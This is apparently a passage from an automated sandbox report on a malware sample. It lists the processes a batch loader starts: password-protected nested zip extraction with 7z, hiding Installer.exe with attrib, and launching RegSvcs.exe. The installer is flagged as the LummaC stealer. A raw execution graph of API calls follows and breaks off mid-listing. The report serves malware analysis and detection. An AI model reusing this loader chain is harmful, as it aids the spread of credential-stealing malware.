                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                      Imagebase:0x7ff7f0ec0000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\System32\mode.com
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:mode 65,10
                                                                                                                                      Imagebase:0x7ff6ff300000
                                                                                                                                      File size:33'280 bytes
                                                                                                                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:7z.exe e file.zip -p1299923009167529232566422481 -oextracted
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:468'992 bytes
                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:468'992 bytes
                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:23:02:02
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:468'992 bytes
                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:23:02:03
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:468'992 bytes
                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:23:02:03
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:468'992 bytes
                                                                                                                                      MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:23:02:03
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:attrib +H "Installer.exe"
                                                                                                                                      Imagebase:0x7ff60bae0000
                                                                                                                                      File size:23'040 bytes
                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:23:02:03
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"Installer.exe"
                                                                                                                                      Imagebase:0x250000
                                                                                                                                      File size:918'840 bytes
                                                                                                                                      MD5 hash:18EB75EF50B1A51600E686B6B9DE277E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:23:02:05
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:45'984 bytes
                                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:14.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:23.6%
                                                                                                                                        Total number of Nodes:1849
                                                                                                                                        Total number of Limit Nodes:22
                                                                                                                                        execution_graph 10343 412240 ??2@YAPAXI 10344 412251 10343->10344 10764 41945f __set_app_type __p__fmode __p__commode 10765 4194ce 10764->10765 10766 4194e2 10765->10766 10767 4194d6 __setusermatherr 10765->10767 10776 4195d6 _controlfp 10766->10776 10767->10766 10769 4194e7 _initterm __getmainargs _initterm 10770 41953b GetStartupInfoA 10769->10770 10772 41956f GetModuleHandleA 10770->10772 10777 4074d5 _EH_prolog 10772->10777 10776->10769 10780 405bfc ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 10777->10780 11183 402017 GetModuleHandleW CreateWindowExW 10780->11183 10783 4074b4 MessageBoxA 10785 4074cb exit _XcptFilter 10783->10785 10784 405c3a 10784->10783 10786 405c54 10784->10786 10787 4014eb 2 API calls 10786->10787 10788 405c8b 10787->10788 10789 4014eb 2 API calls 10788->10789 10790 405c96 10789->10790 11186 404794 10790->11186 10795 402ab8 2 API calls 10796 405cd2 10795->10796 11195 4030cc 10796->11195 10798 405cdb lstrlenW 11209 40574f 10798->11209 10803 40574f 9 API calls 10804 405d11 10803->10804 10805 40574f 9 API calls 10804->10805 10806 405d1c 10805->10806 11225 404d0b #17 10806->11225 10809 405d34 wsprintfW 10811 405d51 10809->10811 10810 4011b7 2 API calls 10810->10809 10812 40574f 9 API calls 10811->10812 10813 405d63 10812->10813 11251 4046e2 10813->11251 10816 4046e2 3 API calls 10818 405dbe 10816->10818 10817 405d7b _wtol 10819 405d91 10817->10819 10820 405dc4 10818->10820 10821 405df8 10818->10821 10819->10816 11463 4052de 10820->11463 10823 4046e2 3 API calls 10821->10823 10824 405e03 10823->10824 10825 405e14 10824->10825 10826 405e09 10824->10826 10829 4046e2 3 API calls 10825->10829 11485 4056f2 10826->11485 10835 405e23 10829->10835 10831 405ddc ??3@YAXPAX ??3@YAXPAX 10831->10785 10832 405e59 GetModuleFileNameW 10833 405e6b 10832->10833 10834 405e7d 10832->10834 10837 409606 57 API calls 10833->10837 10838 4046e2 3 API calls 10834->10838 10835->10832 10836 4011b7 2 API calls 10835->10836 10836->10832 11029 405dc9 ??3@YAXPAX 10837->11029 10849 405e9f 10838->10849 10839 406047 10840 40143c 2 API calls 10839->10840 10841 406057 10840->10841 10842 40143c 2 API calls 10841->10842 10846 406064 10842->10846 10843 405f9c 10845 4046e2 3 API calls 10843->10845 10844 405f69 10844->10843 10848 405f85 _wtol 10844->10848 10844->11029 10857 405ffb 10845->10857 10847 4060e9 10846->10847 10851 401403 2 API calls 10846->10851 10850 402696 3 API calls 10847->10850 10848->10843 10849->10839 10849->10843 10849->10844 10854 401795 2 API calls 10849->10854 10849->11029 10852 40610b 10850->10852 10853 406099 10851->10853 10855 401403 2 API calls 10852->10855 10856 401403 2 API calls 10853->10856 10854->10849 10858 406116 ??2@YAPAXI 10855->10858 10862 4060af 10856->10862 10857->10839 10859 404e9f 2 API calls 10857->10859 10860 406122 10858->10860 10861 40602c 10859->10861 11256 4123e3 10860->11256 10861->10839 10863 40143c 2 API calls 10861->10863 10864 40143c 2 API calls 10862->10864 10863->10839 10865 4060d9 10864->10865 10867 40247d 19 API calls 10865->10867 10869 4060e0 10867->10869 10872 402ab8 2 API calls 10869->10872 10870 406175 11259 402b19 10870->11259 10871 40614f 10873 409606 57 API calls 10871->10873 10872->10847 10873->11029 10877 40618a 10878 406190 10877->10878 10879 4061b4 10877->10879 10880 409606 57 API calls 10878->10880 10881 406246 10879->10881 10883 4046e2 3 API calls 10879->10883 10882 406198 ??3@YAXPAX 10880->10882 11293 4127e6 10881->11293 10882->11029 10886 4061cb 10883->10886 10886->10881 10894 4061d1 10886->10894 10887 406273 10889 40622a ??3@YAXPAX 10887->10889 10898 40627c 10887->10898 10889->11029 10891 406268 ??3@YAXPAX 10891->11029 10892 406288 wsprintfW 10895 40247d 19 API calls 10892->10895 10893 4062bb 11296 404f0e 10893->11296 10894->10889 11493 40599c 10894->11493 10895->10898 10898->10892 10898->10893 10902 40574f 9 API calls 10898->10902 10900 40574f 9 API calls 10955 4062da 10900->10955 10901 406200 10901->10889 10903 406206 10901->10903 10902->10898 10904 409606 57 API calls 10903->10904 10905 40620e ??3@YAXPAX 10904->10905 10905->11029 10906 406594 10907 4065f3 10906->10907 10908 402a67 2 API calls 10906->10908 10909 40574f 9 API calls 10907->10909 10910 4065b2 10908->10910 10912 406624 10909->10912 10913 404bfd 3 API calls 10910->10913 10911 404505 lstrlenW lstrlenW _wcsnicmp 10911->10955 10914 402a67 2 API calls 10912->10914 10915 4065c5 10913->10915 10916 40662f 10914->10916 10917 40143c 2 API calls 10915->10917 11361 404bfd 10916->11361 10920 4065d1 ??3@YAXPAX ??3@YAXPAX 10917->10920 10922 405976 4 API calls 10920->10922 10924 4065eb 10922->10924 10923 40143c 2 API calls 10925 406650 ??3@YAXPAX ??3@YAXPAX 10923->10925 10926 405950 4 API calls 10924->10926 11373 405976 10925->11373 10926->10907 10928 40666a 11378 405950 10928->11378 10930 406672 10931 40574f 9 API calls 10930->10931 10932 40667f 10931->10932 10933 404f0e 26 API calls 10932->10933 10934 406688 10933->10934 10935 4067f4 10934->10935 11576 402744 AllocateAndInitializeSid 10934->11576 11383 4029a6 10935->11383 10939 4066af 10941 4014eb 2 API calls 10939->10941 10940 40689f 11386 404952 10940->11386 10943 4066b7 10941->10943 10942 402a67 2 API calls 10985 40680b 10942->10985 10946 4014eb 2 API calls 10943->10946 10944 4064b5 _wtol 10944->10955 10948 4066bf GetCommandLineW 10946->10948 10951 404e9f 2 API calls 10948->10951 10949 406926 CoInitialize 10957 4029a6 lstrcmpW 10949->10957 10950 4014eb 2 API calls 10950->10955 10956 4066cf 10951->10956 10952 4068a1 ??3@YAXPAX 10952->10940 10954 4029a6 lstrcmpW 10958 4068d5 10954->10958 10955->10906 10955->10911 10955->10944 10955->10950 10959 404e9f 2 API calls 10955->10959 10986 4065f8 ??3@YAXPAX 10955->10986 11548 405195 10955->11548 11559 4049a9 10955->11559 11573 401503 10955->11573 10960 402a67 2 API calls 10956->10960 10961 40694c 10957->10961 10962 4068e5 10958->10962 10966 40247d 19 API calls 10958->10966 10959->10955 10963 4066da 10960->10963 10965 406960 10961->10965 10972 401403 2 API calls 10961->10972 11591 404495 10962->11591 10969 404cb1 2 API calls 10963->10969 10964 4014eb ??2@YAPAXI ??3@YAXPAX 10964->10985 10973 4044ae 16 API calls 10965->10973 10966->10962 10976 4066f8 10969->10976 10970 40143c 2 API calls 10970->10985 10972->10965 10977 406966 10973->10977 10979 404ccf 2 API calls 10976->10979 10982 4029a6 lstrcmpW 10977->10982 10978 40844b 22 API calls 10983 406908 10978->10983 10980 406705 10979->10980 10984 404ccf 2 API calls 10980->10984 10981 401403 2 API calls 10981->10985 10987 406976 10982->10987 11594 4081be ??3@YAXPAX 10983->11594 10989 406712 10984->10989 10985->10940 10985->10942 10985->10952 10985->10964 10985->10970 10985->10981 11584 4035cf ??2@YAPAXI 10985->11584 11590 402990 ??3@YAXPAX ??3@YAXPAX 10985->11590 10986->11029 10991 406a4f 10987->10991 10998 40698f lstrlenW 10987->10998 11579 404ced 10989->11579 10994 4029a6 lstrcmpW 10991->10994 10992 406913 ??3@YAXPAX 10992->10949 10995 406a60 10994->10995 10999 406a74 10995->10999 11000 406a67 _wtol 10995->11000 11016 4069a7 10998->11016 11003 406a96 10999->11003 11595 4097f6 10999->11595 11000->10999 11001 4017c0 2 API calls 11004 40672c 11001->11004 11002 40687c ??3@YAXPAX 11005 4029a6 lstrcmpW 11002->11005 11008 406aaa 11003->11008 11009 406a86 ??3@YAXPAX 11003->11009 11612 4096fb 11003->11612 11007 40143c 2 API calls 11004->11007 11005->10985 11010 406738 7 API calls 11007->11010 11051 406adb 11008->11051 11392 4015d8 11008->11392 11009->11003 11012 4053b2 9 API calls 11010->11012 11014 406780 11012->11014 11017 40678a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11014->11017 11018 4067be ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11014->11018 11022 401503 2 API calls 11016->11022 11017->11029 11018->11029 11019 406ac1 ??3@YAXPAX 11019->11029 11020 4014eb 2 API calls 11020->11051 11022->10991 11023 406c64 ??3@YAXPAX 11023->11029 11024 406b19 GetKeyState 11024->11051 11025 406cc6 11027 406cfc 11025->11027 11028 406cce 11025->11028 11026 4029a6 lstrcmpW 11026->11051 11032 4013d1 2 API calls 11027->11032 11666 4048a3 11028->11666 11480 4047e1 11029->11480 11030 401795 ??2@YAPAXI ??3@YAXPAX 11030->11051 11035 406d0a 11032->11035 11037 4044ae 16 API calls 11035->11037 11036 40143c 2 API calls 11038 406ceb ??3@YAXPAX 11036->11038 11039 406d13 11037->11039 11047 406d33 11038->11047 11040 406d24 ??3@YAXPAX 11039->11040 11044 40143c 2 API calls 11039->11044 11040->11047 11041 406cb6 ??3@YAXPAX ??3@YAXPAX 11041->11029 11042 406c59 ??3@YAXPAX 11042->11051 11043 406c83 11045 409606 57 API calls 11043->11045 11044->11040 11046 406c8f ??3@YAXPAX ??3@YAXPAX 11045->11046 11046->11029 11049 406d70 11047->11049 11050 406d7d 11047->11050 11048 401403 ??2@YAPAXI ??3@YAXPAX 11048->11051 11405 4019d2 ??2@YAPAXI 11049->11405 11679 408caa 11050->11679 11051->11020 11051->11023 11051->11024 11051->11025 11051->11026 11051->11030 11051->11041 11051->11042 11051->11043 11051->11048 11645 408bec 11051->11645 11658 408c6a 11051->11658 11054 406d79 11055 406dba 11054->11055 11056 406d8f 11054->11056 11057 404952 22 API calls 11055->11057 11687 40477e 11056->11687 11059 406dbf 11057->11059 11061 4073b0 11059->11061 11062 4014eb 2 API calls 11059->11062 11064 407428 11061->11064 11066 4029a6 lstrcmpW 11061->11066 11063 406ddd 11062->11063 11106 406df0 11063->11106 11691 404e49 11063->11691 11065 40746b ??3@YAXPAX ??3@YAXPAX 11064->11065 11071 4029a6 lstrcmpW 11064->11071 11069 407484 11065->11069 11070 40748a ??3@YAXPAX 11065->11070 11068 4073e1 11066->11068 11068->11064 11758 404765 11068->11758 11069->11070 11072 4047e1 4 API calls 11070->11072 11073 407447 11071->11073 11075 40749b ??3@YAXPAX ??3@YAXPAX 11072->11075 11073->11065 11077 407454 11073->11077 11074 4014eb ??2@YAPAXI ??3@YAXPAX 11074->11106 11075->10785 11080 4013d1 2 API calls 11077->11080 11078 406e1f 11081 407246 ??3@YAXPAX ??3@YAXPAX 11078->11081 11082 406e2c 11078->11082 11086 407463 11080->11086 11085 40734f 11081->11085 11087 404ccf 2 API calls 11082->11087 11083 4029a6 lstrcmpW 11083->11106 11084 40844b 22 API calls 11088 40741d 11084->11088 11089 4073a7 ??3@YAXPAX 11085->11089 11095 404952 22 API calls 11085->11095 11762 405793 11086->11762 11091 406e48 11087->11091 11761 4081be ??3@YAXPAX 11088->11761 11089->11061 11097 404ccf 2 API calls 11091->11097 11092 406e8c 11094 401403 2 API calls 11092->11094 11098 406e95 11094->11098 11099 40735e 11095->11099 11100 406e55 11097->11100 11102 4044e2 20 API calls 11098->11102 11748 4051f3 11099->11748 11105 40143c 2 API calls 11100->11105 11101 4072ac ??3@YAXPAX ??3@YAXPAX 11101->11085 11121 406e9e 11102->11121 11103 401403 2 API calls 11103->11106 11108 406e61 ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 11105->11108 11106->11074 11106->11078 11106->11083 11106->11092 11106->11101 11106->11103 11109 401795 2 API calls 11106->11109 11107 407377 SetCurrentDirectoryW 11110 4051f3 4 API calls 11107->11110 11111 406e88 11108->11111 11112 40725d 11108->11112 11114 406f2c ??3@YAXPAX ??3@YAXPAX 11109->11114 11115 40739f 11110->11115 11111->11092 11113 40477e 16 API calls 11112->11113 11116 407262 11113->11116 11114->11106 11117 40477e 16 API calls 11115->11117 11118 409606 57 API calls 11116->11118 11117->11089 11119 40726b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11118->11119 11119->11029 11120 4072a1 11119->11120 11120->11029 11122 406fcb _wtol 11121->11122 11123 40453f lstrlenW lstrlenW _wcsnicmp 11121->11123 11124 40708f 11121->11124 11122->11121 11123->11121 11125 407098 11124->11125 11126 4070ea 11124->11126 11127 4070bd 11125->11127 11128 40709e 11125->11128 11129 40143c 2 API calls 11126->11129 11132 401403 2 API calls 11127->11132 11130 401403 2 API calls 11128->11130 11131 4070e8 11129->11131 11133 4070a9 11130->11133 11134 402ab8 2 API calls 11131->11134 11135 4070bb 11132->11135 11136 402ab8 2 API calls 11133->11136 11137 4070fc 11134->11137 11138 4029a6 lstrcmpW 11135->11138 11139 4070b2 11136->11139 11140 4014eb 2 API calls 11137->11140 11141 4070d2 11138->11141 11142 402ab8 2 API calls 11139->11142 11143 407104 11140->11143 11141->11137 11144 402ab8 2 API calls 11141->11144 11142->11135 11145 404e9f 2 API calls 11143->11145 11144->11131 11146 407111 11145->11146 11147 402a67 2 API calls 11146->11147 11148 40711c 11147->11148 11149 4044e2 20 API calls 11148->11149 11150 407125 11149->11150 11151 407200 11150->11151 11426 402713 11150->11426 11153 40732e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11151->11153 11155 407214 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11151->11155 11153->11085 11154 40713a 11154->11151 11156 407154 11154->11156 11157 402ab8 2 API calls 11154->11157 11155->11081 11158 4044e2 20 API calls 11156->11158 11157->11156 11159 40716c 11158->11159 11160 4071e2 11159->11160 11161 407173 11159->11161 11700 405489 11160->11700 11435 404cb1 11161->11435 11164 4071f0 11166 4072cb SetLastError 11164->11166 11167 4071fb 11164->11167 11171 4072d2 11166->11171 11745 4026ab 11167->11745 11173 409606 57 API calls 11171->11173 11172 4017c0 2 API calls 11174 4071a8 ??3@YAXPAX ??3@YAXPAX 11172->11174 11175 4072dc 11173->11175 11445 4053b2 11174->11445 11177 40477e 16 API calls 11175->11177 11179 4072e1 7 API calls 11177->11179 11178 4071cc 11181 4072c3 ??3@YAXPAX 11178->11181 11182 4071da ??3@YAXPAX 11178->11182 11180 407321 11179->11180 11180->11153 11181->11171 11182->11167 11184 40204c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 11183->11184 11185 40207f GetVersionExW 11183->11185 11184->11185 11185->10783 11185->10784 11187 4011b7 2 API calls 11186->11187 11188 4047a9 GetCommandLineW 11187->11188 11189 404e9f 11188->11189 11190 404ed9 11189->11190 11191 404ead 11189->11191 11192 404ed1 11190->11192 11194 401795 2 API calls 11190->11194 11191->11192 11193 401795 2 API calls 11191->11193 11192->10795 11193->11191 11194->11190 11196 4014eb 2 API calls 11195->11196 11204 4030dc 11196->11204 11197 4031c2 11198 40143c 2 API calls 11197->11198 11199 4031cf ??3@YAXPAX 11198->11199 11199->10798 11200 401795 ??2@YAPAXI ??3@YAXPAX 11200->11204 11202 4014eb 2 API calls 11202->11204 11204->11197 11204->11200 11204->11202 11205 40143c 2 API calls 11204->11205 11801 402b31 11204->11801 11804 402dce 11204->11804 11206 40313c ??3@YAXPAX 11205->11206 11207 4014bc 2 API calls 11206->11207 11208 403151 ??3@YAXPAX ??3@YAXPAX 11207->11208 11208->11204 11210 4014eb 2 API calls 11209->11210 11211 40575d 11210->11211 11212 4014eb 2 API calls 11211->11212 11213 405765 11212->11213 11214 401403 2 API calls 11213->11214 11215 405770 11214->11215 11216 401403 2 API calls 11215->11216 11217 40577b 11216->11217 11218 4035cf 7 API calls 11217->11218 11219 405789 11218->11219 11819 402990 ??3@YAXPAX ??3@YAXPAX 11219->11819 11221 405791 11222 402696 11221->11222 11820 402665 LoadLibraryA GetProcAddress 11222->11820 11224 40269b 11224->10803 11226 404d22 11225->11226 11227 402427 3 API calls 11226->11227 11228 404d27 11227->11228 11229 40247d 19 API calls 11228->11229 11230 404d2e 11229->11230 11231 40247d 19 API calls 11230->11231 11232 404d3a 11231->11232 11233 40247d 19 API calls 11232->11233 11234 404d46 11233->11234 11235 40247d 19 API calls 11234->11235 11236 404d52 11235->11236 11237 40247d 19 API calls 11236->11237 11238 404d5e 11237->11238 11239 40247d 19 API calls 11238->11239 11240 404d6a 11239->11240 11241 40247d 19 API calls 11240->11241 11247 404d76 11241->11247 11242 404d91 SHGetSpecialFolderPathW 11243 404dab wsprintfW 11242->11243 11242->11247 11244 4014eb 2 API calls 11243->11244 11244->11247 11245 404e44 11245->10809 11245->10810 11246 4014eb 2 API calls 11246->11247 11247->11242 11247->11245 11247->11246 11249 401403 ??2@YAPAXI ??3@YAXPAX 11247->11249 11250 4035cf 7 API calls 11247->11250 11823 402990 ??3@YAXPAX ??3@YAXPAX 11247->11823 11249->11247 11250->11247 11252 4046f1 11251->11252 11253 40472e 11252->11253 11254 40470b lstrlenW lstrlenW 11252->11254 11253->10817 11253->10819 11824 401f6a 11254->11824 11834 4123c1 11256->11834 11260 402805 2 API calls 11259->11260 11261 402b2d 11260->11261 11262 403f89 11261->11262 11263 402665 3 API calls 11262->11263 11264 403f97 11263->11264 11265 402b19 2 API calls 11264->11265 11266 403fd0 11265->11266 11267 402b19 2 API calls 11266->11267 11268 403fd8 11267->11268 11269 402b19 2 API calls 11268->11269 11270 403fe0 11269->11270 11840 403e98 11270->11840 11276 404076 11277 403e98 7 API calls 11276->11277 11279 40408c 11277->11279 11278 403e98 7 API calls 11283 40401d 11278->11283 11280 402ee4 10 API calls 11279->11280 11282 40409e 11280->11282 11281 402ee4 10 API calls 11281->11283 11883 402c7f 11282->11883 11283->11276 11283->11278 11283->11281 11285 402c7f 2 API calls 11283->11285 11886 402c49 11283->11886 11285->11283 11287 404114 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11287->10877 11288 403e98 7 API calls 11290 4040b4 11288->11290 11289 402ee4 10 API calls 11289->11290 11290->11287 11290->11288 11290->11289 11291 402c49 2 API calls 11290->11291 11292 402c7f 2 API calls 11290->11292 11291->11290 11292->11290 11929 412709 11293->11929 11297 4029a6 lstrcmpW 11296->11297 11298 404f27 11297->11298 11299 404f77 11298->11299 11301 401403 2 API calls 11298->11301 11300 4029a6 lstrcmpW 11299->11300 11302 404f95 11300->11302 11303 404f3e 11301->11303 11305 4029a6 lstrcmpW 11302->11305 11304 40247d 19 API calls 11303->11304 11306 404f45 11304->11306 11307 404fad 11305->11307 11308 402ab8 2 API calls 11306->11308 11310 4029a6 lstrcmpW 11307->11310 11309 404f4e 11308->11309 11311 401403 2 API calls 11309->11311 11312 404fc5 11310->11312 11313 404f67 11311->11313 11315 4029a6 lstrcmpW 11312->11315 11314 40247d 19 API calls 11313->11314 11316 404f6e 11314->11316 11317 404fdd 11315->11317 11318 402ab8 2 API calls 11316->11318 11319 404fe4 lstrcmpiW 11317->11319 11320 404ff4 11317->11320 11318->11299 11319->11320 11321 4029a6 lstrcmpW 11320->11321 11322 40500a 11321->11322 11323 4029a6 lstrcmpW 11322->11323 11324 405037 11323->11324 11327 405044 11324->11327 11955 404690 11324->11955 11326 4029a6 lstrcmpW 11331 405058 11326->11331 11327->11326 11328 405078 11330 4029a6 lstrcmpW 11328->11330 11337 40508b 11330->11337 11331->11328 11332 4029a6 lstrcmpW 11331->11332 11959 404637 11331->11959 11332->11331 11333 4050ab 11335 4029a6 lstrcmpW 11333->11335 11336 4050b7 11335->11336 11338 4029a6 lstrcmpW 11336->11338 11337->11333 11339 4029a6 lstrcmpW 11337->11339 11963 404668 11337->11963 11340 4050c8 11338->11340 11339->11337 11341 4029a6 lstrcmpW 11340->11341 11342 4050d9 11341->11342 11343 4050e6 _wtol 11342->11343 11344 4050ef 11342->11344 11343->11344 11345 4029a6 lstrcmpW 11344->11345 11346 4050fb 11345->11346 11347 405102 _wtol 11346->11347 11348 40510b 11346->11348 11347->11348 11349 4029a6 lstrcmpW 11348->11349 11350 405117 11349->11350 11351 4029a6 lstrcmpW 11350->11351 11352 40512f 11351->11352 11353 4029a6 lstrcmpW 11352->11353 11354 405147 11353->11354 11355 4029a6 lstrcmpW 11354->11355 11356 40515f 11355->11356 11357 4029a6 lstrcmpW 11356->11357 11358 40517c 11357->11358 11359 40518d 11358->11359 11360 40247d 19 API calls 11358->11360 11359->10900 11360->11359 11362 404c17 11361->11362 11363 404c2e 11362->11363 11364 404c23 11362->11364 11365 4014eb 2 API calls 11363->11365 11366 4013d1 2 API calls 11364->11366 11367 404c37 11365->11367 11369 404c2c 11366->11369 11368 4011b7 2 API calls 11367->11368 11370 404c40 11368->11370 11369->10923 11371 4013d1 2 API calls 11370->11371 11372 404c73 ??3@YAXPAX 11371->11372 11372->11369 11971 404c84 11373->11971 11379 404c84 2 API calls 11378->11379 11380 405962 11379->11380 11989 404813 11380->11989 11993 402910 11383->11993 11387 404963 11386->11387 11388 4049a6 11386->11388 11389 4013d1 2 API calls 11387->11389 11390 4044e2 20 API calls 11387->11390 11388->10949 11388->10954 11389->11387 11391 404980 SetEnvironmentVariableW ??3@YAXPAX 11390->11391 11391->11387 11391->11388 11393 4015f2 ??2@YAPAXI 11392->11393 11398 4015ea 11392->11398 11394 401601 11393->11394 11404 412a6a 3 API calls 11394->11404 11395 401623 11997 40113f 11395->11997 11397 401647 11397->11398 11399 412574 VariantClear 11397->11399 11400 4016aa 11397->11400 11398->11019 11398->11051 11399->11397 12002 401556 11400->12002 11403 412574 VariantClear 11403->11398 11404->11395 11406 4019eb 11405->11406 11425 412a6a 3 API calls 11406->11425 11407 401a0f 11408 401a90 11407->11408 11409 401a21 ??2@YAPAXI 11407->11409 11411 409606 57 API calls 11408->11411 11410 401a2d 11409->11410 11412 40113f 177 API calls 11410->11412 11424 401aa9 11411->11424 11413 401a5a 11412->11413 11413->11408 11414 401a61 11413->11414 11415 401a79 ??2@YAPAXI 11414->11415 11416 4039e7 88 API calls 11414->11416 11417 401a85 11415->11417 11418 401a8c 11415->11418 11419 401a74 11416->11419 12615 4016d4 11417->12615 11421 